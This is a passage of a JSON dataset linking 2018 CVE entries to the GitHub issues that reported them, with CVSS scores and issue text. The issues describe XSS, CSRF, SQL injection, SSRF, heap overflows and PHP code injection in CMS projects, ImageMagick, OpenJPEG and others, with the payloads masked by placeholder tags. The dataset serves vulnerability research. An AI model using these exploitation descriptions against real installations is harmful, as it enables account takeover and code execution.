        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16372",
        "Issue_Url_old": "https://github.com/iechoo/ideacms/issues/1",
        "Issue_Url_new": "https://github.com/iechoo/ideacms/issues/1",
        "Repo_new": "iechoo/ideacms",
        "Issue_Created_At": "2018-08-07T08:41:11Z",
        "description": "Ideacms has a reflected Cross Site Scripting Vulnerability. I have found a reflected Cross Site Scripting Vulnerability. The parameter \u2018kw\u2019 lack of xss_clean function to checkout user's input ,that cause a reflected xss vulnerability. payload\uff1a APITAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16373",
        "Issue_Url_old": "https://github.com/philippe/FrogCMS/issues/13",
        "Issue_Url_new": "https://github.com/philippe/frogcms/issues/13",
        "Repo_new": "philippe/frogcms",
        "Issue_Created_At": "2018-08-24T07:29:45Z",
        "description": "Frog CMS NUMBERTAG has a file upload Vulnerability in PATHTAG When I check this function ,I found out in line NUMBERTAG we can see if filename did not exists,we can also upload a new file and new content throuth APITAG function,and in line NUMBERTAG file create directly. FILETAG then i try to upload a new filename and new content in this request FILETAG and the code is running FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.9,
        "impactScore": 3.6,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2018-16374",
        "Issue_Url_old": "https://github.com/philippe/FrogCMS/issues/14",
        "Issue_Url_new": "https://github.com/philippe/frogcms/issues/14",
        "Repo_new": "philippe/frogcms",
        "Issue_Created_At": "2018-08-28T14:53:56Z",
        "description": "Frog CMS NUMBERTAG has a stored Cross Site Scripting Vulnerability. I have found a stored Cross Site Scripting vulnerability in URLTAG FILETAG When I click save button,the http request like this: FILETAG And the rowspage parameter was not XSS filtered resulting in storage XSS vulnerability FILETAG EXP is as follows: FILETAG The result of EXP is as follows: FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2018-16375",
        "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/1126",
        "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/1126",
        "Repo_new": "uclouvain/openjpeg",
        "Issue_Created_At": "2018-07-26T12:31:16Z",
        "description": "Missing checks for APITAG and APITAG in function pnmtoimage in PATHTAG which can lead to heap buffer overflow. Function pnmtoimage in PATHTAG misses checks for APITAG and APITAG which can lead to heap buffer overflow. (see NUMBERTAG CODETAG Below is the proposal patch. CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16376",
        "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/1127",
        "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/1127",
        "Repo_new": "uclouvain/openjpeg",
        "Issue_Created_At": "2018-07-26T12:39:30Z",
        "description": "Potential heap based buffer overflow in function t2_encode_packet in PATHTAG . There are two missing checks for length in function t2_encode_packet in PATHTAG . (see NUMBERTAG ERRORTAG Below is the proposal patch for t2_encode_packet function. ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16380",
        "Issue_Url_old": "https://github.com/n00dles/ogma-CMS/issues/39",
        "Issue_Url_new": "https://github.com/n00dles/ogma-cms/issues/39",
        "Repo_new": "n00dles/ogma-CMS",
        "Issue_Created_At": "2018-08-22T12:26:42Z",
        "description": "Here's a CSRF vulnerability NUMBERTAG Here's a CSRF vulnerability. Due to the lack of corresponding verification measures, when the administrator logs into the background of the website, the malicious HTML file constructed by the attacker will be automatically added to the administrator account. An attacker can log into the background as an administrator for a series of operations. POC: CODETAG Finally, the file is executed and the administrator account is successfully executed. FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16385",
        "Issue_Url_old": "https://github.com/top-think/framework/issues/1375",
        "Issue_Url_new": "https://github.com/top-think/framework/issues/1375",
        "Repo_new": "top-think/framework",
        "Issue_Created_At": "2018-08-10T09:32:09Z",
        "description": "APITAG SQL\u6ce8\u5165\u6f0f\u6d1e. \u6f0f\u6d1e\u5229\u7528 \u6f0f\u6d1edemo\u4ee3\u7801\uff1a ERRORTAG \u6f0f\u6d1e\u539f\u56e0\u662f\u5904\u7406order by\u53c2\u6570\u65f6\uff0c\u5982\u679c\u53c2\u6570\u7528\u6237\u53ef\u63a7\uff0c\u5f53\u53c2\u6570\u4e3a\u6570\u7ec4key APITAG \u8bbf\u95ee\u5982\u4e0b\u94fe\u63a5\u5373\u53ef\u89e6\u53d1SQL\u6ce8\u5165\u6f0f\u6d1e\uff1a APITAG FILETAG \u53ef\u4ee5\u770b\u5230\u6211\u4eec\u6210\u529f\u83b7\u53d6\u5230\u6570\u636e\u5e93\u4e2d\u7684\u5f53\u524d\u7528\u6237\u540d\u3002 \u4fee\u590d\u5efa\u8bae \u5bf9order by\u8bed\u53e5\u5904\u7406\u6d41\u7a0b\u52a0\u4e0a\u6570\u7ec4\u5206\u652f\u5b89\u5168\u6821\u9a8c\u3002",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-16387",
        "Issue_Url_old": "https://github.com/jbroadway/elefant/issues/285",
        "Issue_Url_new": "https://github.com/jbroadway/elefant/issues/285",
        "Repo_new": "jbroadway/elefant",
        "Issue_Created_At": "2018-08-09T09:00:46Z",
        "description": "There is a CSRF vulnerability that can add the administrator account. After the administrator logged in, open the following page poc\uff1a APITAG add a admin ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16409",
        "Issue_Url_old": "https://github.com/gogs/gogs/issues/5372",
        "Issue_Url_new": "https://github.com/gogs/gogs/issues/5372",
        "Repo_new": "gogs/gogs",
        "Issue_Created_At": "2018-08-09T08:33:32Z",
        "description": "server side request forgery (SSRF) vulnerability in migrate. Gogs version (or commit ref NUMBERTAG Can you reproduce the bug at FILETAG x ] Yes ( URLTAG [ ] No [ ] Not relevant Log gist (usually found in APITAG ): Description attacker may use [migrate URLTAG to send arbitrary http get requests. impact just like NUMBERTAG APITAG Patch only allow migration from trusted sources URLTAG salt of Tencent's Xuanwu Lab",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 8.6,
        "impactScore": 4.0,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-16413",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1251",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1251",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2018-08-19T14:25:19Z",
        "description": "heap buffer overflow bug in APITAG APITAG APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description I used fuzz technology to fuzz the imagemagick and found a heap overflow bug. Steps to Reproduce APITAG NUMBERTAG a NUMBERTAG b NUMBERTAG fa fa fa fd fd fd fd fa fa fd fd fd fd NUMBERTAG a NUMBERTAG c0: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd NUMBERTAG a NUMBERTAG d0: fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa NUMBERTAG a NUMBERTAG e0: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd NUMBERTAG a NUMBERTAG f0: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd NUMBERTAG a NUMBERTAG fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Contiguous container OOB:fc APITAG internal: fe NUMBERTAG ABORTING System Configuration APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG i NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): Environment APITAG system, version and so on): Ubuntu NUMBERTAG LTS NUMBERTAG arch PATHTAG uname a Linux ubuntu NUMBERTAG generic APITAG Ubuntu SMP Fri Feb NUMBERTAG UTC NUMBERTAG i NUMBERTAG i NUMBERTAG i NUMBERTAG APITAG Additional information: APITAG May I know whether this can be assigned with a CVE ID?",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16413",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1249",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1249",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2018-08-16T12:19:36Z",
        "description": "heap buffer overflow bug in APITAG private.h:. Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description I used fuzz technology to fuzz the imagemagick and found a heap overflow bug. Steps to Reproduce APITAG NUMBERTAG a NUMBERTAG b NUMBERTAG fa fa fa fd fd fd fd fa fa fd fd fd fd NUMBERTAG a NUMBERTAG c0: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd NUMBERTAG a NUMBERTAG d0: fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa NUMBERTAG a NUMBERTAG e0: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd NUMBERTAG a NUMBERTAG f0: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd NUMBERTAG a NUMBERTAG fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Contiguous container OOB:fc APITAG internal: fe NUMBERTAG ABORTING System Configuration APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG i NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): Environment APITAG system, version and so on): Ubuntu NUMBERTAG LTS NUMBERTAG arch $ uname a Linux ubuntu NUMBERTAG generic APITAG Ubuntu SMP Wed Jul NUMBERTAG UTC NUMBERTAG i NUMBERTAG i NUMBERTAG i NUMBERTAG APITAG Additional information: May I know whether this can be assigned with a CVE ID? APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16416",
        "Issue_Url_old": "https://github.com/daylightstudio/FUEL-CMS/issues/481",
        "Issue_Url_new": "https://github.com/daylightstudio/fuel-cms/issues/481",
        "Repo_new": "daylightstudio/fuel-cms",
        "Issue_Created_At": "2018-08-27T23:57:21Z",
        "description": "Cross site request forgery (CSRF) vulnerability. Cross site request forgery (CSRF) vulnerability in \" URLTAG \" in FUELCMS NUMBERTAG allows remote attackers to hijack the authentication of unspecified users for requests that change administrator's password poc\uff1a CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16435",
        "Issue_Url_old": "https://github.com/mm2/Little-CMS/issues/171",
        "Issue_Url_new": "https://github.com/mm2/little-cms/issues/171",
        "Repo_new": "mm2/little-cms",
        "Issue_Created_At": "2018-08-14T01:36:36Z",
        "description": "Heap Buffer Overflow in APITAG VULNERABILITY DETAILS I have audited source code of lcms library and I have founded a vulnerability in APITAG FILETAG FILETAG FILETAG function (cmscgats.c). The attached it8 could crash lcms when ASAN was enabled on Linux. ERRORTAG if APITAG is NUMBERTAG and APITAG is NUMBERTAG APITAG is larger than the maximum representable value NUMBERTAG ffffffff). The result of an overflow is that the least significant representable bits of the result are stored. Data will point to a small memory region and can not use to store large data. REPRODUCTION CASE Following code will trigger crash CODETAG ASAN Log: ERRORTAG PATCH ERRORTAG I have checked the lastest version of LCMS. The vulnerability still exists. URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-16447",
        "Issue_Url_old": "https://github.com/philippe/FrogCMS/issues/12",
        "Issue_Url_new": "https://github.com/philippe/frogcms/issues/12",
        "Repo_new": "philippe/frogcms",
        "Issue_Created_At": "2018-08-10T05:48:34Z",
        "description": "There is a CSRF in page URLTAG FILETAG I wrote a test script for CSRF. APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG FILETAG FILETAG Success\uff01\uff01\uff01 FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16448",
        "Issue_Url_old": "https://github.com/chshcms/cscms/issues/1",
        "Issue_Url_new": "https://github.com/chshcms/cscms/issues/1",
        "Repo_new": "chshcms/cscms",
        "Issue_Created_At": "2018-08-10T13:50:34Z",
        "description": "There is a CSRF vulnerability that creates vip members and administrators, and it can also modify administrator's passwords and authenticate vip members.. first: Create a member FILETAG FILETAG second\uff1a authenticate vip members. FILETAG FILETAG third: Create a super administrator and web editor. FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16449",
        "Issue_Url_old": "https://github.com/liu21st/onethink/issues/37",
        "Issue_Url_new": "https://github.com/liu21st/onethink/issues/37",
        "Repo_new": "liu21st/onethink",
        "Issue_Created_At": "2018-08-24T11:43:02Z",
        "description": "There are three CSRF vulnerabilities that can add pages to the website home page. After the Administrator logged in,open the following two pages. poc: FILETAG add a page to the website home page and can jump to designated website. CODETAG FILETAG add a blog and through the audit. CODETAG FILETAG FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16458",
        "Issue_Url_old": "https://github.com/baigoStudio/baigoCMS/issues/5",
        "Issue_Url_new": "https://github.com/baigostudio/baigocms/issues/5",
        "Repo_new": "baigostudio/baigocms",
        "Issue_Created_At": "2018-09-04T07:31:52Z",
        "description": "Cross site request forgery (CSRF) vulnerability. Cross site request forgery (CSRF) vulnerability in \" URLTAG \" in APITAG NUMBERTAG Can publish articles at will poc: APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16468",
        "Issue_Url_old": "https://github.com/flavorjones/loofah/issues/154",
        "Issue_Url_new": "https://github.com/flavorjones/loofah/issues/154",
        "Repo_new": "flavorjones/loofah",
        "Issue_Created_At": "2018-10-27T19:06:55Z",
        "description": "placeholder security vulnerability.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-16515",
        "Issue_Url_old": "https://github.com/matrix-org/synapse/issues/3796",
        "Issue_Url_new": "https://github.com/matrix-org/synapse/issues/3796",
        "Repo_new": "matrix-org/synapse",
        "Issue_Created_At": "2018-09-05T15:32:49Z",
        "description": "CVETAG . This is a placeholder for the security issues identified by CVETAG CVETAG .",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16548",
        "Issue_Url_old": "https://github.com/gdraheim/zziplib/issues/58",
        "Issue_Url_new": "https://github.com/gdraheim/zziplib/issues/58",
        "Repo_new": "gdraheim/zziplib",
        "Issue_Created_At": "2018-09-05T07:47:08Z",
        "description": "There are memory leaks in zziplib NUMBERTAG which is trigged in APITAG APITAG There are memory leaks in zziplib NUMBERTAG which is trigged in APITAG APITAG I wrote a demo based on the documentation. CODETAG when i use [( URLTAG memory leak happened ERRORTAG It seems hdr0 doesn't free correctly in some cases.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16551",
        "Issue_Url_old": "https://github.com/LavaLite/cms/issues/259",
        "Issue_Url_new": "https://github.com/lavalite/cms/issues/259",
        "Repo_new": "lavalite/cms",
        "Issue_Created_At": "2018-09-04T02:44:50Z",
        "description": "find.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-16604",
        "Issue_Url_old": "https://github.com/dignajar/nibbleblog/issues/131",
        "Issue_Url_new": "https://github.com/dignajar/nibbleblog/issues/131",
        "Repo_new": "dignajar/nibbleblog",
        "Issue_Created_At": "2018-09-06T10:05:20Z",
        "description": "someone can getshell with admin's password. It allows Remote Code execution by changing username to PHP code. (for APITAG Consequently, an attacker can execute arbitrary PHP code by changing username. The reason is because the username is surrounded by double quotes NUMBERTAG username is \"admin\" CODETAG NUMBERTAG username change to APITAG ( URLTAG FILETAG APITAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2018-16608",
        "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/453",
        "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/453",
        "Repo_new": "monstra-cms/monstra",
        "Issue_Created_At": "2018-08-16T12:55:51Z",
        "description": "Insecure direct object reference. FILETAG Vulnerable URL: ' URLTAG Hello sir, I have found a Insecure Direct Object Reference vulnerability in Monstra NUMBERTAG in the vulnerable URL page. Here I was able to change the password of an administrator user while being authenticated a user with APITAG role by changing the 'user_id' parameter to that of the target user. I have prepared and attached a doc with details of the vulnerability and steps to reproduce.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16622",
        "Issue_Url_old": "https://github.com/doramart/DoraCMS/issues/136",
        "Issue_Url_new": "https://github.com/doramart/doracms/issues/136",
        "Repo_new": "doramart/doracms",
        "Issue_Created_At": "2018-04-18T01:56:08Z",
        "description": "There is an XSS vulnerability here. After logging in to individual users, go to URLTAG Insert XSS payload in \u6458\u8981 and \u8be6\u60c5, publish; FILETAG The POC request is: FILETAG At URLTAG Pop up a web page window FILETAG Log in to the administrator demo account and go to the APITAG is test, please detele\u201d edit. Click 'XSS' to pop up a web page FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-16636",
        "Issue_Url_old": "https://github.com/NucleusCMS/NucleusCMS/issues/84",
        "Issue_Url_new": "https://github.com/nucleuscms/nucleuscms/issues/84",
        "Repo_new": "nucleuscms/nucleuscms",
        "Issue_Created_At": "2018-08-21T05:43:03Z",
        "description": "HTML Injection in Nucleus CMS NUMBERTAG Affected software: Nucleus CMS NUMBERTAG Type of vulnerability: HTML Injection Discovered by: Provensec Website: FILETAG Author: Balvinder Singh Description: HTML injection is a type of injection issue that occurs when a user is able to control an input point and is able to inject arbitrary HTML code into a vulnerable web page. This vulnerability can have many consequences, like disclosure of a user's session cookies that could be used to impersonate the victim, or, more generally, it can allow the attacker to modify the page content seen by the victims. Proof of concept: Step1: Login to the nucleus cms. Step2: URL: URLTAG Here the body parameter is vulnerable to HTML Injection. FILETAG Step3: Here the HTML injection got executed for body parameter. URL: URLTAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16640",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1201",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1201",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2018-07-06T12:20:04Z",
        "description": "Potential memory leak in function APITAG in coders/png.c. Prerequisites Y ] I have written a descriptive issue title [ Y ] I have verified that I am using the latest version of APITAG [ Y ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description There is a potential memory leak vulnerability in APITAG function in coders/png.c. ( URLTAG As we can see, when chunk equals to NULL APITAG NUMBERTAG the program should call APITAG function firstly. Otherwise, there would be a memory leak vulnerability. Line NUMBERTAG Line NUMBERTAG and Line NUMBERTAG Line NUMBERTAG are the correct way to handle this condition. ERRORTAG APITAG version: current version APITAG version)",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16642",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1162",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1162",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2018-06-01T06:37:39Z",
        "description": "There is a potential out of bound write bug in function APITAG APITAG Prerequisites Y] I have written a descriptive issue title [ Y] I have verified that I am using the latest version of APITAG [ Y] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description There is a vulnerability named CVETAG . Below is the detailed information about the vulnerability. DESCRIPTION of CVETAG coders/wpg.c in APITAG allows remote attackers to cause a denial of service (out of bounds write) via a crafted file. ISSUE of CVETAG NUMBERTAG PATCH of CVETAG URLTAG URLTAG As we can see from the patch information, there was a fix in APITAG in coders/wpg.c. And it is similar to APITAG in coders/cuts.c. APITAG ( URLTAG ERRORTAG URLTAG APITAG ( FILETAG So, I think there should be a fix in APITAG in coders/cut.c. Steps to Reproduce APITAG System Configuration APITAG APITAG version: Environment APITAG system, version and so on): Additional information: APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16643",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1199",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1199",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2018-07-05T03:29:31Z",
        "description": "Missing check for fputc function in multiple files.. Prerequisites Y] I have written a descriptive issue title [Y] I have verified that I am using the latest version of APITAG [Y] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description There are NUMBERTAG functions APITAG APITAG APITAG APITAG that miss check for fputc function. As issued in NUMBERTAG And patch for NUMBERTAG is APITAG I think there should be add status flag when \"fputc(c, file) != c\". APITAG version: latest version",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16644",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1269",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1269",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2018-08-27T09:14:39Z",
        "description": "Missing check for length in function APITAG of coders/dcm.c and function APITAG of coders/pict.c. Prerequisites Y ] I have written a descriptive issue title [ Y ] I have verified that I am using the latest version of APITAG [ Y ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There are two missing check for variable length. ERRORTAG (coders/dcm.c) ERRORTAG (coders/pict.c) In my opinion, we should check whether length is bigger than APITAG or not. If condition APITAG satisfies, we should throw exception like ERRORTAG . APITAG version: latest version APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16645",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1268",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1268",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2018-08-27T08:59:26Z",
        "description": "Potential Out of memory in function APITAG of coders/bmp.c and APITAG of codes/dib.c.. Prerequisites Y ] I have written a descriptive issue title [ Y ] I have verified that I am using the latest version of APITAG [ Y ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There are two missing check for number_colors in function APITAG of coders/bmp.c and APITAG of codes/dib.c, which may lead to out of memory vulnerability. CODETAG ERRORTAG The patch for bmp and dib is similar. Below is the proposal patch for bmp.c. ERRORTAG APITAG version: latest version APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-16663",
        "Issue_Url_old": "https://github.com/contiki-ng/contiki-ng/issues/599",
        "Issue_Url_new": "https://github.com/contiki-ng/contiki-ng/issues/599",
        "Repo_new": "contiki-ng/contiki-ng",
        "Issue_Created_At": "2018-07-09T16:47:47Z",
